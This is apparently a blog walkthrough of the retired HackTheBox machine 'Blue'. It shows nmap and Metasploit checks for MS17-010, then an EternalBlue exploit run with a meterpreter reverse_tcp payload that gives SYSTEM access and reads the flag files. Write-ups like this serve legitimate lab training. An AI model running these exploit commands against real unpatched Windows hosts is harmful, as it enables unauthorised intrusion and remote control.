Blue HackTheBox WalkThrough

Blue HackTheBox WalkThrough

This is Blue HackTheBox machine walkthrough and is the 11th machine of our OSCP like HTB boxes series. In this writeup, I have demonstrated step-by-step how I rooted to Blue HTB machine. Before starting let us know something about this machine. It is a windows box with IP address 10.10.10.40 and difficulty low assigned by its maker.

This machine is currently retired so you will require VIP subscription at hackthebox.eu to access this machine. First of all, connect your PC with HackTheBox VPN and make sure your connectivity with Blue machine by pinging its IP 10.10.10.40. If all goes correct then start hacking. As usual I started by scanning the machine. Used Nmap [a port scanner] for this task and the result is below-

Scanning

$nmap -sC -sV -oN blue.nmap 10.10.10.40

Performing Namp scan on Blue machine during its walkthrough

Nmap revealed that many number of ports are open. Microsoft RPC on port 135, netbios-ssn on port 139 and SMB on port 445 are running. Among all open ports only ports 135, 139 and 445 are useful for us because we can enumerate a lot on these ports. We have tools like smbmap, smbclient, enum4linux, rpcclient and even more to enumerate on these 3 ports.

Before going further for enumeration on port 445 for SMB shares we should not forget to test for NSA's EternalBlue Exploit which was leaked by Shadow Broker hacker group in 2017. For more information about this exploit you should read this Wikipedia article.

So whenever you see smb service is running on port 445 or 135 then first exploit that should strike to your mind is EternalBlue Doublepulsar whose detail was issued in Microsoft bulletin ms17-010. To check whether this machine is vulnerable to eternalblue exploit there is an nmap script smb-vuln-ms17-010.nse and also a metasploit auxiliary module auxiliary/scanner/smb/smb_ms17_010 which scan the machine for ms17-10 patch. You can use any one method to check. I have used both the methods just to show you the vulnerability.

Checking For ms17-010 Exploit

$nmap -p 445 10.10.10.40 --script=smb-vuln-ms17-010.nse

Checking for ms17-010 exploit using namp during Blue HackTheBox WalkThrough

Nmap script smb-vuln-ms17-010.nse revealed that Blue machine is vulnerable to ms17-010 exploit. Let us check it with metasploit’s auxiliary module auxiliary/scanner/smb/smb_ms17_010 for this vulnerability.

msf5 > search eternalblue

msf5 > use auxiliary/scanner/smb/smb_ms17_010

msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.10.10.40

msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit

Checking for ms17-010 exploit using metasploit during Blue HackTheBox WalkThrough

Metasploit module also revealed that it is vulnerable to ms17-010 exploit. Let us know something about ms17-10 exploit. Basically ms17-010 is an exploit suit which consists of 5 exploits. Among them first two is scanner and last three are exploiter. Since we have confirmed that it is vulnerable to ms17-010 exploit so any one of the exploit from last three of them can help in getting shell. I tried first one and could easily got user shell.

Getting User Shell

msf5 > use exploit/windows/smb/ms17_010_eternalblue

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40

msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.6

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

Getting user and root shell in blue htb machine

So we have got shell very easily and that too with admin privilege. Now we don’t require to escalate privilege because we are already an NT AUTHORITY\SYSTEM which is the highest level of privilege a windows user has. I think since this machine was vulnerable to eternalblue exploit that’s why it is named as blue by its maker which is suffix of eternalblue. Let’s capture user and root flag.

Capture User Flag

meterpreter > cat "C:\Users\haris\Desktop\user.txt"

Capture user flag during blue htb box

Capture Root Flag

meterpreter > cat "C:\Users\Administrator\Desktop\root.txt"

Capturing root flag during blue hackthebox walkthrough

This was how I rooted Blue HackTheBox machine. This was very easy box. Hope you guys have learnt some new things from this walkthrough. Thanks for reading this writeup. For any suggestion and query related to walkthrough feel free to write us at [email protected].

Next retired machine walkthrough is Nineveh.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am a Computer Science student. I like to share my knowledge of hacking with others. I used to write walkthrough on different challenges of HackTheBox & DVWA . In part time I do bug bounty hunting and penetration testing on websites.